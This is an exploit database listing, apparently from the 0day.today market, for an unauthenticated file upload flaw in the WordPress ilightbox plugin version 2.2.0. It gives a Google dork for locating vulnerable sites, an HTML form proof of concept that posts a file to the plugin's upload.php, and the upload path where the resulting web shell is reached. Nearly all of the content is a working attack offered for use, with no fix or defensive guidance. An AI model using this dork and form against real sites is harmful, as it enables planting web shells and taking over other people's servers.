[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress ilightbox Plugin File Upload Vulnerability

Author
sniper.t
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-24700
Category
web applications
Date add
10-12-2015
Platform
php
Exploit Title: WordPress Plugin ilightbox File Upload Vulnerability
Date : 2015-12-09
Vendor Homepage : http://www.ilightbox.net/
Version : 2.2.0
Google dork: inurl:/wp-content/plugins/ilightbox
===========================================

  
POC (Exploit code)
<form action="http://localhost/wordpress/wp-content/plugins/ilightbox/lib/upload.php" method="POST" enctype="multipart/form-data">
<input type="file" name="qqfile">
<input type="submit" value="Upload">
</form>

shell   http://localhost/wordpress/wp-content/uploads//2015/12/shell.name


#  0day.today [2024-06-30]  #